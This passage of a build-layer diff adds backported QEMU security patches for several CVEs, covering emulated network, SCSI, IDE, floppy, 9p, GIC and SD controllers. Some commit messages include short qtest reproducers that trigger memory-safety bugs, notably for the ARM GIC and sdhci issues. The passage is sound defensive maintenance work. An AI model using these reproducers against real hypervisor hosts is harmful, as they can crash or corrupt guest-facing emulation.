+         } else { /* as per intel docs; skip descriptors with null buf addr */
+             trace_e1000e_rx_null_descriptor();
+         }
++        desc_offset += desc_size;
++        if (desc_offset >= total_size) {
++            is_last = true;
++        }
+ 
+         e1000e_write_rx_descr(core, desc, is_last ? core->rx_pkt : NULL,
+                            rss_info, do_ps ? ps_hdr_len : 0, &bastate.written);
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch
new file mode 100644
index 0000000000..1528d5c2fd
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch
@@ -0,0 +1,45 @@
+From 813212288970c39b1800f63e83ac6e96588095c6 Mon Sep 17 00:00:00 2001
+From: Paolo Bonzini <pbonzini@redhat.com>
+Date: Tue, 1 Dec 2020 13:09:26 +0100
+Subject: [PATCH] ide: atapi: assert that the buffer pointer is in range
+
+A case was reported where s->io_buffer_index can be out of range.
+The report skimped on the details but it seems to be triggered
+by s->lba == -1 on the READ/READ CD paths (e.g. by sending an
+ATAPI command with LBA = 0xFFFFFFFF).  For now paper over it
+with assertions.  The first one ensures that there is no overflow
+when incrementing s->io_buffer_index, the second checks for the
+buffer overrun.
+
+Note that the buffer overrun is only a read, so I am not sure
+if the assertion failure is actually less harmful than the overrun.
+
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+Message-id: 20201201120926.56559-1-pbonzini@redhat.com
+Reviewed-by: Kevin Wolf <kwolf@redhat.com>
+Signed-off-by: Peter Maydell <peter.maydell@linaro.org>
+
+Upstream-Status: Backport
+CVE: CVE-2020-29443
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/ide/atapi.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/hw/ide/atapi.c b/hw/ide/atapi.c
+index 14a2b0bb2f..e79157863f 100644
+--- a/hw/ide/atapi.c
++++ b/hw/ide/atapi.c
+@@ -276,6 +276,8 @@ void ide_atapi_cmd_reply_end(IDEState *s)
+         s->packet_transfer_size -= size;
+         s->elementary_transfer_size -= size;
+         s->io_buffer_index += size;
++        assert(size <= s->io_buffer_total_len);
++        assert(s->io_buffer_index <= s->io_buffer_total_len);
+ 
+         /* Some adapters process PIO data right away.  In that case, we need
+          * to avoid mutual recursion between ide_transfer_start
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-35504.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-35504.patch
new file mode 100644
index 0000000000..97d32589d8
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-35504.patch
@@ -0,0 +1,51 @@
+Backport of:
+
+From 0db895361b8a82e1114372ff9f4857abea605701 Mon Sep 17 00:00:00 2001
+From: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
+Date: Wed, 7 Apr 2021 20:57:50 +0100
+Subject: [PATCH] esp: always check current_req is not NULL before use in DMA
+ callbacks
+
+After issuing a SCSI command the SCSI layer can call the SCSIBusInfo .cancel
+callback which resets both current_req and current_dev to NULL. If any data
+is left in the transfer buffer (async_len != 0) then the next TI (Transfer
+Information) command will attempt to reference the NULL pointer causing a
+segfault.
+
+Buglink: https://bugs.launchpad.net/qemu/+bug/1910723
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909247
+Signed-off-by: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Message-Id: <20210407195801.685-2-mark.cave-ayland@ilande.co.uk>
+
+CVE: CVE-2020-35504
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-35504.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/0db895361b8a82e1114372ff9f4857abea605701 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/scsi/esp.c | 19 ++++++++++++++-----
+ 1 file changed, 14 insertions(+), 5 deletions(-)
+
+--- a/hw/scsi/esp.c
++++ b/hw/scsi/esp.c
+@@ -362,6 +362,11 @@ static void do_dma_pdma_cb(ESPState *s)
+         do_cmd(s, s->cmdbuf);
+         return;
+     }
++
++    if (!s->current_req) {
++        return;
++    }
++
+     s->dma_left -= len;
+     s->async_buf += len;
+     s->async_len -= len;
+@@ -415,6 +420,9 @@ static void esp_do_dma(ESPState *s)
+         do_cmd(s, s->cmdbuf);
+         return;
+     }
++    if (!s->current_req) {
++        return;
++    }
+     if (s->async_len == 0) {
+         /* Defer until data is available.  */
+         return;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-35505.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-35505.patch
new file mode 100644
index 0000000000..40c0b1e74f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-35505.patch
@@ -0,0 +1,45 @@
+Backport of:
+
+From 99545751734035b76bd372c4e7215bb337428d89 Mon Sep 17 00:00:00 2001
+From: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
+Date: Wed, 7 Apr 2021 20:57:55 +0100
+Subject: [PATCH] esp: ensure cmdfifo is not empty and current_dev is non-NULL
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+When about to execute a SCSI command, ensure that cmdfifo is not empty and
+current_dev is non-NULL. This can happen if the guest tries to execute a TI
+(Transfer Information) command without issuing one of the select commands
+first.
+
+Buglink: https://bugs.launchpad.net/qemu/+bug/1910723
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909247
+Signed-off-by: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
+Reviewed-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Message-Id: <20210407195801.685-7-mark.cave-ayland@ilande.co.uk>
+
+CVE: CVE-2020-35505
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-35505.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/99545751734035b76bd372c4e7215bb337428d89  ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+Signed-off-by: Emily Vekariya <emily.vekariya@einfochips.com>
+---
+ hw/scsi/esp.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/hw/scsi/esp.c b/hw/scsi/esp.c
+index c7d701bf..c2a67bc8 100644
+--- a/hw/scsi/esp.c
++++ b/hw/scsi/esp.c
+@@ -193,6 +193,10 @@ static void do_busid_cmd(ESPState *s, uint8_t *buf, uint8_t busid)
+ 
+     trace_esp_do_busid_cmd(busid);
+     lun = busid & 7;
++
++    if (!s->current_dev) {
++        return;
++    }
+     current_lun = scsi_device_find(&s->bus, 0, s->current_dev->id, lun);
+     s->current_req = scsi_req_new(current_lun, 0, lun, buf, s);
+     datalen = scsi_req_enqueue(s->current_req);
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch
new file mode 100644
index 0000000000..1b8c77f838
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch
@@ -0,0 +1,81 @@
+From c2d2d14e8deece958bbc4fc649d22c3564bc4e7e Mon Sep 17 00:00:00 2001
+From: Greg Kurz <groug@kaod.org>
+Date: Thu, 14 Jan 2021 17:04:12 +0100
+Subject: [PATCH] 9pfs: Fully restart unreclaim loop (CVE-2021-20181)
+
+Depending on the client activity, the server can be asked to open a huge
+number of file descriptors and eventually hit RLIMIT_NOFILE. This is
+currently mitigated using a reclaim logic : the server closes the file
+descriptors of idle fids, based on the assumption that it will be able
+to re-open them later. This assumption doesn't hold of course if the
+client requests the file to be unlinked. In this case, we loop on the
+entire fid list and mark all related fids as unreclaimable (the reclaim
+logic will just ignore them) and, of course, we open or re-open their
+file descriptors if needed since we're about to unlink the file.
+
+This is the purpose of v9fs_mark_fids_unreclaim(). Since the actual
+opening of a file can cause the coroutine to yield, another client
+request could possibly add a new fid that we may want to mark as
+non-reclaimable as well. The loop is thus restarted if the re-open
+request was actually transmitted to the backend. This is achieved
+by keeping a reference on the first fid (head) before traversing
+the list.
+
+This is wrong in several ways:
+- a potential clunk request from the client could tear the first
+  fid down and cause the reference to be stale. This leads to a
+  use-after-free error that can be detected with ASAN, using a
+  custom 9p client
+- fids are added at the head of the list : restarting from the
+  previous head will always miss fids added by a some other
+  potential request
+
+All these problems could be avoided if fids were being added at the
+end of the list. This can be achieved with a QSIMPLEQ, but this is
+probably too much change for a bug fix. For now let's keep it
+simple and just restart the loop from the current head.
+
+Fixes: CVE-2021-20181
+Buglink: https://bugs.launchpad.net/qemu/+bug/1911666
+Reported-by: Zero Day Initiative <zdi-disclosures@trendmicro.com>
+Reviewed-by: Christian Schoenebeck <qemu_oss@crudebyte.com>
+Reviewed-by: Stefano Stabellini <sstabellini@kernel.org>
+Message-Id: <161064025265.1838153.15185571283519390907.stgit@bahia.lan>
+Signed-off-by: Greg Kurz <groug@kaod.org>
+
+Upstream-Status: Backport [89fbea8737e8f7b954745a1ffc4238d377055305]
+CVE: CVE-2021-20181
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/9pfs/9p.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c
+index 94df440fc..6026b51a1 100644
+--- a/hw/9pfs/9p.c
++++ b/hw/9pfs/9p.c
+@@ -502,9 +502,9 @@ static int coroutine_fn v9fs_mark_fids_unreclaim(V9fsPDU *pdu, V9fsPath *path)
+ {
+     int err;
+     V9fsState *s = pdu->s;
+-    V9fsFidState *fidp, head_fid;
++    V9fsFidState *fidp;
+ 
+-    head_fid.next = s->fid_list;
++again:
+     for (fidp = s->fid_list; fidp; fidp = fidp->next) {
+         if (fidp->path.size != path->size) {
+             continue;
+@@ -524,7 +524,7 @@ static int coroutine_fn v9fs_mark_fids_unreclaim(V9fsPDU *pdu, V9fsPath *path)
+              * switched to the worker thread
+              */
+             if (err == 0) {
+-                fidp = &head_fid;
++                goto again;
+             }
+         }
+     }
+-- 
+2.29.2
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-20196.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-20196.patch
new file mode 100644
index 0000000000..e9b815740f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20196.patch
@@ -0,0 +1,62 @@
+From 94608c59045791dfd35102bc59b792e96f2cfa30 Mon Sep 17 00:00:00 2001
+From: Vivek Kumbhar <vkumbhar@mvista.com>
+Date: Tue, 29 Nov 2022 15:57:13 +0530
+Subject: [PATCH] CVE-2021-20196
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/1ab95af033a419e7a64e2d58e67dd96b20af5233]
+CVE: CVE-2021-20196
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+
+hw/block/fdc: Kludge missing floppy drive to fix CVE-2021-20196
+
+Guest might select another drive on the bus by setting the
+DRIVE_SEL bit of the DIGITAL OUTPUT REGISTER (DOR).
+The current controller model doesn't expect a BlockBackend
+to be NULL. A simple way to fix CVE-2021-20196 is to create
+an empty BlockBackend when it is missing. All further
+accesses will be safely handled, and the controller state
+machines keep behaving correctly.
+---
+ hw/block/fdc.c | 19 ++++++++++++++++++-
+ 1 file changed, 18 insertions(+), 1 deletion(-)
+
+diff --git a/hw/block/fdc.c b/hw/block/fdc.c
+index ac5d31e8..e128e975 100644
+--- a/hw/block/fdc.c
++++ b/hw/block/fdc.c
+@@ -58,6 +58,11 @@
+         }                                                       \
+     } while (0)
+ 
++/* Anonymous BlockBackend for empty drive */
++static BlockBackend *blk_create_empty_drive(void)
++{
++    return blk_new(qemu_get_aio_context(), 0, BLK_PERM_ALL);
++}
+ 
+ /********************************************************/
+ /* qdev floppy bus                                      */
+@@ -1356,7 +1361,19 @@ static FDrive *get_drv(FDCtrl *fdctrl, int unit)
+ 
+ static FDrive *get_cur_drv(FDCtrl *fdctrl)
+ {
+-    return get_drv(fdctrl, fdctrl->cur_drv);
++    FDrive *cur_drv = get_drv(fdctrl, fdctrl->cur_drv);
++
++    if (!cur_drv->blk) {
++        /*
++         * Kludge: empty drive line selected. Create an anonymous
++         * BlockBackend to avoid NULL deref with various BlockBackend
++         * API calls within this model (CVE-2021-20196).
++         * Due to the controller QOM model limitations, we don't
++         * attach the created to the controller device.
++         */
++        cur_drv->blk = blk_create_empty_drive();
++    }
++    return cur_drv;
+ }
+ 
+ /* Status A register : 0x00 (read-only) */
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-20203.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-20203.patch
new file mode 100644
index 0000000000..31440af0bd
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20203.patch
@@ -0,0 +1,74 @@
+From: Prasad J Pandit <pjp@fedoraproject.org>
+
+While activating device in vmxnet3_acticate_device(), it does not
+validate guest supplied configuration values against predefined
+minimum - maximum limits. This may lead to integer overflow or
+OOB access issues. Add checks to avoid it.
+
+Fixes: CVE-2021-20203
+Buglink: https://bugs.launchpad.net/qemu/+bug/1913873
+Reported-by: Gaoning Pan <pgn@zju.edu.cn>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+
+Upstream-Status: Acepted [https://lists.gnu.org/archive/html/qemu-devel/2021-01/msg07935.html]
+CVE: CVE-2021-20203
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ hw/net/vmxnet3.c | 13 +++++++++++++
+ 1 file changed, 13 insertions(+)
+
+diff --git a/hw/net/vmxnet3.c b/hw/net/vmxnet3.c
+index eff299f629..4a910ca971 100644
+--- a/hw/net/vmxnet3.c
++++ b/hw/net/vmxnet3.c
+@@ -1420,6 +1420,7 @@ static void vmxnet3_activate_device(VMXNET3State *s)
+     vmxnet3_setup_rx_filtering(s);
+     /* Cache fields from shared memory */
+     s->mtu = VMXNET3_READ_DRV_SHARED32(d, s->drv_shmem, devRead.misc.mtu);
++    assert(VMXNET3_MIN_MTU <= s->mtu && s->mtu < VMXNET3_MAX_MTU);
+     VMW_CFPRN("MTU is %u", s->mtu);
+ 
+     s->max_rx_frags =
+@@ -1473,6 +1474,9 @@ static void vmxnet3_activate_device(VMXNET3State *s)
+         /* Read rings memory locations for TX queues */
+         pa = VMXNET3_READ_TX_QUEUE_DESCR64(d, qdescr_pa, conf.txRingBasePA);
+         size = VMXNET3_READ_TX_QUEUE_DESCR32(d, qdescr_pa, conf.txRingSize);
++        if (size > VMXNET3_TX_RING_MAX_SIZE) {
++            size = VMXNET3_TX_RING_MAX_SIZE;
++        }
+ 
+         vmxnet3_ring_init(d, &s->txq_descr[i].tx_ring, pa, size,
+                           sizeof(struct Vmxnet3_TxDesc), false);
+@@ -1483,6 +1487,9 @@ static void vmxnet3_activate_device(VMXNET3State *s)
+         /* TXC ring */
+         pa = VMXNET3_READ_TX_QUEUE_DESCR64(d, qdescr_pa, conf.compRingBasePA);
+         size = VMXNET3_READ_TX_QUEUE_DESCR32(d, qdescr_pa, conf.compRingSize);
++        if (size > VMXNET3_TC_RING_MAX_SIZE) {
++            size = VMXNET3_TC_RING_MAX_SIZE;
++        }
+         vmxnet3_ring_init(d, &s->txq_descr[i].comp_ring, pa, size,
+                           sizeof(struct Vmxnet3_TxCompDesc), true);
+         VMXNET3_RING_DUMP(VMW_CFPRN, "TXC", i, &s->txq_descr[i].comp_ring);
+@@ -1524,6 +1531,9 @@ static void vmxnet3_activate_device(VMXNET3State *s)
+             /* RX rings */
+             pa = VMXNET3_READ_RX_QUEUE_DESCR64(d, qd_pa, conf.rxRingBasePA[j]);
+             size = VMXNET3_READ_RX_QUEUE_DESCR32(d, qd_pa, conf.rxRingSize[j]);
++            if (size > VMXNET3_RX_RING_MAX_SIZE) {
++                size = VMXNET3_RX_RING_MAX_SIZE;
++            }
+             vmxnet3_ring_init(d, &s->rxq_descr[i].rx_ring[j], pa, size,
+                               sizeof(struct Vmxnet3_RxDesc), false);
+             VMW_CFPRN("RX queue %d:%d: Base: %" PRIx64 ", Size: %d",
+@@ -1533,6 +1543,9 @@ static void vmxnet3_activate_device(VMXNET3State *s)
+         /* RXC ring */
+         pa = VMXNET3_READ_RX_QUEUE_DESCR64(d, qd_pa, conf.compRingBasePA);
+         size = VMXNET3_READ_RX_QUEUE_DESCR32(d, qd_pa, conf.compRingSize);
++        if (size > VMXNET3_RC_RING_MAX_SIZE) {
++            size = VMXNET3_RC_RING_MAX_SIZE;
++        }
+         vmxnet3_ring_init(d, &s->rxq_descr[i].comp_ring, pa, size,
+                           sizeof(struct Vmxnet3_RxCompDesc), true);
+         VMW_CFPRN("RXC queue %d: Base: %" PRIx64 ", Size: %d", i, pa, size);
+-- 
+2.29.2
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch
new file mode 100644
index 0000000000..46c9ab4184
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch
@@ -0,0 +1,67 @@
+From edfe2eb4360cde4ed5d95bda7777edcb3510f76a Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Sun, 31 Jan 2021 11:34:01 +0100
+Subject: [PATCH] hw/intc/arm_gic: Fix interrupt ID in GICD_SGIR register
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Per the ARM Generic Interrupt Controller Architecture specification
+(document "ARM IHI 0048B.b (ID072613)"), the SGIINTID field is 4 bit,
+not 10:
+
+  - 4.3 Distributor register descriptions
+  - 4.3.15 Software Generated Interrupt Register, GICD_SG
+
+    - Table 4-21 GICD_SGIR bit assignments
+
+    The Interrupt ID of the SGI to forward to the specified CPU
+    interfaces. The value of this field is the Interrupt ID, in
+    the range 0-15, for example a value of 0b0011 specifies
+    Interrupt ID 3.
+
+Correct the irq mask to fix an undefined behavior (which eventually
+lead to a heap-buffer-overflow, see [Buglink]):
+
+   $ echo 'writel 0x8000f00 0xff4affb0' | qemu-system-aarch64 -M virt,accel=qtest -qtest stdio
+   [I 1612088147.116987] OPENED
+  [R +0.278293] writel 0x8000f00 0xff4affb0
+  ../hw/intc/arm_gic.c:1498:13: runtime error: index 944 out of bounds for type 'uint8_t [16][8]'
+  SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior ../hw/intc/arm_gic.c:1498:13
+
+This fixes a security issue when running with KVM on Arm with
+kernel-irqchip=off. (The default is kernel-irqchip=on, which is
+unaffected, and which is also the correct choice for performance.)
+
+Cc: qemu-stable@nongnu.org
+Fixes: CVE-2021-20221
+Fixes: 9ee6e8bb853 ("ARMv7 support.")
+Buglink: https://bugs.launchpad.net/qemu/+bug/1913916
+Buglink: https://bugs.launchpad.net/qemu/+bug/1913917
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Message-id: 20210131103401.217160-1-f4bug@amsat.org
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Peter Maydell <peter.maydell@linaro.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-20221
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/intc/arm_gic.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/intc/arm_gic.c
+===================================================================
+--- qemu-4.2.0.orig/hw/intc/arm_gic.c
++++ qemu-4.2.0/hw/intc/arm_gic.c
+@@ -1455,7 +1455,7 @@ static void gic_dist_writel(void *opaque
+         int target_cpu;
+ 
+         cpu = gic_get_current_cpu(s);
+-        irq = value & 0x3ff;
++        irq = value & 0xf;
+         switch ((value >> 24) & 3) {
+         case 0:
+             mask = (value >> 16) & ALL_CPU_MASK;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch
new file mode 100644
index 0000000000..7175b24e99
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch
@@ -0,0 +1,55 @@
+From affdf476543405045c281a7c67d1eaedbcea8135 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 13:45:28 +0800
+Subject: [PATCH] e1000: fail early for evil descriptor
+
+During procss_tx_desc(), driver can try to chain data descriptor with
+legacy descriptor, when will lead underflow for the following
+calculation in process_tx_desc() for bytes:
+
+            if (tp->size + bytes > msh)
+                bytes = msh - tp->size;
+
+This will lead a infinite loop. So check and fail early if tp->size if
+greater or equal to msh.
+
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Reported-by: Cheolwoo Myung <cwmyung@snu.ac.kr>
+Reported-by: Ruhr-University Bochum <bugs-syssec@rub.de>
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [3de46e6fc489c52c9431a8a832ad8170a7569bd8]
+CVE: CVE-2021-20257
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/e1000.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/hw/net/e1000.c b/hw/net/e1000.c
+index cf22c4f07..c3564c7ce 100644
+--- a/hw/net/e1000.c
++++ b/hw/net/e1000.c
+@@ -670,6 +670,9 @@ process_tx_desc(E1000State *s, struct e1000_tx_desc *dp)
+         msh = tp->tso_props.hdr_len + tp->tso_props.mss;
+         do {
+             bytes = split_size;
++            if (tp->size >= msh) {
++                goto eop;
++            }
+             if (tp->size + bytes > msh)
+                 bytes = msh - tp->size;
+ 
+@@ -695,6 +698,7 @@ process_tx_desc(E1000State *s, struct e1000_tx_desc *dp)
+         tp->size += split_size;
+     }
+ 
++eop:
+     if (!(txd_lower & E1000_TXD_CMD_EOP))
+         return;
+     if (!(tp->cptse && tp->size < tp->tso_props.hdr_len)) {
+-- 
+2.29.2
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3392.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3392.patch
new file mode 100644
index 0000000000..45b8a4f1dd
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3392.patch
@@ -0,0 +1,92 @@
+From 3791642c8d60029adf9b00bcb4e34d7d8a1aea4d Mon Sep 17 00:00:00 2001
+From: Michael Tokarev <mjt@tls.msk.ru>
+Date: Mon, 19 Apr 2021 15:42:47 +0200
+Subject: [PATCH] mptsas: Remove unused MPTSASState 'pending' field
+ (CVE-2021-3392)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+While processing SCSI i/o requests in mptsas_process_scsi_io_request(),
+the Megaraid emulator appends new MPTSASRequest object 'req' to
+the 's->pending' queue. In case of an error, this same object gets
+dequeued in mptsas_free_request() only if SCSIRequest object
+'req->sreq' is initialised. This may lead to a use-after-free issue.
+
+Since s->pending is actually not used, simply remove it from
+MPTSASState.
+
+Cc: qemu-stable@nongnu.org
+Signed-off-by: Michael Tokarev <mjt@tls.msk.ru>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Reported-by: Cheolwoo Myung <cwmyung@snu.ac.kr>
+Message-id: 20210419134247.1467982-1-f4bug@amsat.org
+Message-Id: <20210416102243.1293871-1-mjt@msgid.tls.msk.ru>
+Suggested-by: Paolo Bonzini <pbonzini@redhat.com>
+Reported-by: Cheolwoo Myung <cwmyung@snu.ac.kr>
+BugLink: https://bugs.launchpad.net/qemu/+bug/1914236 (CVE-2021-3392)
+Fixes: e351b826112 ("hw: Add support for LSI SAS1068 (mptsas) device")
+[PMD: Reworded description, added more tags]
+Signed-off-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Peter Maydell <peter.maydell@linaro.org>
+
+Upstream-Status: Backport [ https://git.qemu.org/?p=qemu.git;a=commit;h=3791642c8d60029adf9b00bcb4e34d7d8a1aea4d ]
+CVE: CVE-2021-3392
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/scsi/mptsas.c | 6 ------
+ hw/scsi/mptsas.h | 1 -
+ 2 files changed, 7 deletions(-)
+
+diff --git a/hw/scsi/mptsas.c b/hw/scsi/mptsas.c
+index 7416e78..db3219e 100644
+--- a/hw/scsi/mptsas.c
++++ b/hw/scsi/mptsas.c
+@@ -251,13 +251,10 @@ static int mptsas_build_sgl(MPTSASState *s, MPTSASRequest *req, hwaddr addr)
+ 
+ static void mptsas_free_request(MPTSASRequest *req)
+ {
+-    MPTSASState *s = req->dev;
+-
+     if (req->sreq != NULL) {
+         req->sreq->hba_private = NULL;
+         scsi_req_unref(req->sreq);
+         req->sreq = NULL;
+-        QTAILQ_REMOVE(&s->pending, req, next);
+     }
+     qemu_sglist_destroy(&req->qsg);
+     g_free(req);
+@@ -303,7 +300,6 @@ static int mptsas_process_scsi_io_request(MPTSASState *s,
+     }
+ 
+     req = g_new0(MPTSASRequest, 1);
+-    QTAILQ_INSERT_TAIL(&s->pending, req, next);
+     req->scsi_io = *scsi_io;
+     req->dev = s;
+ 
+@@ -1319,8 +1315,6 @@ static void mptsas_scsi_realize(PCIDevice *dev, Error **errp)
+ 
+     s->request_bh = qemu_bh_new(mptsas_fetch_requests, s);
+ 
+-    QTAILQ_INIT(&s->pending);
+-
+     scsi_bus_new(&s->bus, sizeof(s->bus), &dev->qdev, &mptsas_scsi_info, NULL);
+ }
+ 
+diff --git a/hw/scsi/mptsas.h b/hw/scsi/mptsas.h
+index b85ac1a..c046497 100644
+--- a/hw/scsi/mptsas.h
++++ b/hw/scsi/mptsas.h
+@@ -79,7 +79,6 @@ struct MPTSASState {
+     uint16_t reply_frame_size;
+ 
+     SCSIBus bus;
+-    QTAILQ_HEAD(, MPTSASRequest) pending;
+ };
+ 
+ void mptsas_fix_scsi_io_endianness(MPIMsgSCSIIORequest *req);
+-- 
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-1.patch
new file mode 100644
index 0000000000..d53383247e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-1.patch
@@ -0,0 +1,85 @@
+From b263d8f928001b5cfa2a993ea43b7a5b3a1811e8 Mon Sep 17 00:00:00 2001
+From: Bin Meng <bmeng.cn@gmail.com>
+Date: Wed, 3 Mar 2021 20:26:35 +0800
+Subject: [PATCH] hw/sd: sdhci: Don't transfer any data when command time out
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+At the end of sdhci_send_command(), it starts a data transfer if the
+command register indicates data is associated. But the data transfer
+should only be initiated when the command execution has succeeded.
+
+With this fix, the following reproducer:
+
+outl 0xcf8 0x80001810
+outl 0xcfc 0xe1068000
+outl 0xcf8 0x80001804
+outw 0xcfc 0x7
+write 0xe106802c 0x1 0x0f
+write 0xe1068004 0xc 0x2801d10101fffffbff28a384
+write 0xe106800c 0x1f 0x9dacbbcad9e8f7061524334251606f7e8d9cabbac9d8e7f60514233241505f
+write 0xe1068003 0x28 0x80d000251480d000252280d000253080d000253e80d000254c80d000255a80d000256880d0002576
+write 0xe1068003 0x1 0xfe
+
+cannot be reproduced with the following QEMU command line:
+
+$ qemu-system-x86_64 -nographic -M pc-q35-5.0 \
+      -device sdhci-pci,sd-spec-version=3 \
+      -drive if=sd,index=0,file=null-co://,format=raw,id=mydrive \
+      -device sd-card,drive=mydrive \
+      -monitor none -serial none -qtest stdio
+
+Cc: qemu-stable@nongnu.org
+Fixes: CVE-2020-17380
+Fixes: CVE-2020-25085
+Fixes: CVE-2021-3409
+Fixes: d7dfca0807a0 ("hw/sdhci: introduce standard SD host controller")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Reported-by: Cornelius Aschermann (Ruhr-Universität Bochum)
+Reported-by: Sergej Schumilo (Ruhr-Universität Bochum)
+Reported-by: Simon Wörner (Ruhr-Universität Bochum)
+Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909418
+Buglink: https://bugzilla.redhat.com/show_bug.cgi?id=1928146
+Acked-by: Alistair Francis <alistair.francis@wdc.com>
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Tested-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
+Message-Id: <20210303122639.20004-2-bmeng.cn@gmail.com>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+
+CVE: CVE-2021-3409 CVE-2020-17380
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-1.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/b263d8f928001b5cfa2a993ea43b7a5b3a1811e8 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/sd/sdhci.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
